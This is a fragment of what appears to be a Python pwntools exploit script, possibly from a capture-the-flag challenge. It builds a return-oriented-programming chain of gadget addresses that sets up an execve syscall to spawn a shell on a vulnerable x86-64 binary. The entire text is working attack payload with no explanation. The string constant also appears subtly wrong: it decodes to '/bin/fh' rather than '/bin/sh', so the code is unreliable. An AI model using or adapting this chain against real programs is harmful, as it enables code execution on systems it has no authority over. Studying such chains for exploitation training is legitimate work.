payload = p64(0x407be5)
#0x0000000000407be5: pop rbx; ret; 
payload += p64(0x410068)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x68662f6e69622f)+p64(0x4076a3)
# 0x00000000004076a3: mov rax, rdi; ret; 
payload += p64(0x407be1)
# 0x0000000000407be1: mov qword ptr [rbx + 8], rax; pop rbx; ret; 
payload += p64(0x0)+p64(0x407be5)
# 0x0000000000407be5: pop rbx; ret; 
payload += p64(0xffff8000)+p64(0x406460)
# 0x0000000000406460: mov eax, ebx; pop rbx; pop rbp; pop r12; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x407864)
# 0x0000000000407864: lea edx, [rax + 0x8000]; cmp edx, 0xffff; ja 0x7879; add rsp, 8; pop rbx; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x4065ae)
# 0x00000000004065ae: pop rsi; ret; 
payload += p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x3b)+p64(0x4076a3)
# 0x00000000004076a3: mov rax, rdi; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x410070)+p64(0x402283)
# 0x0000000000402283: syscall; 
payload += b''
